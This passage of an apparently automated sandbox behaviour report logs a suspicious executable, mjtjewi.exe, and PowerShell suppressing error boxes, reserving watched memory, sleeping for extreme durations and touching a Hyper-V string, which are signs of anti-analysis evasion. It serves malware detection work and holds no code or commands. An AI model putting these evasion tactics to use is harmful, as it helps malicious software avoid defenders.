                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeMemory allocated: 1520000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeMemory allocated: 2F10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeMemory allocated: 4F10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeMemory allocated: 5550000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeMemory allocated: 6550000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeMemory allocated: 6680000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeMemory allocated: 7680000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeMemory allocated: 7A10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeMemory allocated: 8A10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeMemory allocated: 9A10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeMemory allocated: AC90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeMemory allocated: BC90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeMemory allocated: C120000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeMemory allocated: D120000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeMemory allocated: 5550000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeMemory allocated: 6680000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeMemory allocated: 7A10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeMemory allocated: 8A10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeMemory allocated: 9A10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3537Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6313Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4084Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exe TID: 1084Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exe TID: 64Thread sleep time: -900000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\mjtjewi.exeThread delayed: delay time: 60000Jump to behavior
                    Source: mjtjewi.exe, 00000005.00000002.2638675432.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, mjtjewi.exe, 00000006.00000002.1470908849.0000000000E48000.00000004.00000020.00020000.00000000.sdmp, mjtjewi.exe, 00000007.00000002.1473273192.0000000000CE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
                    Source: powershell.exe, 00000000.00000002.1507180884.0000020C63BC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
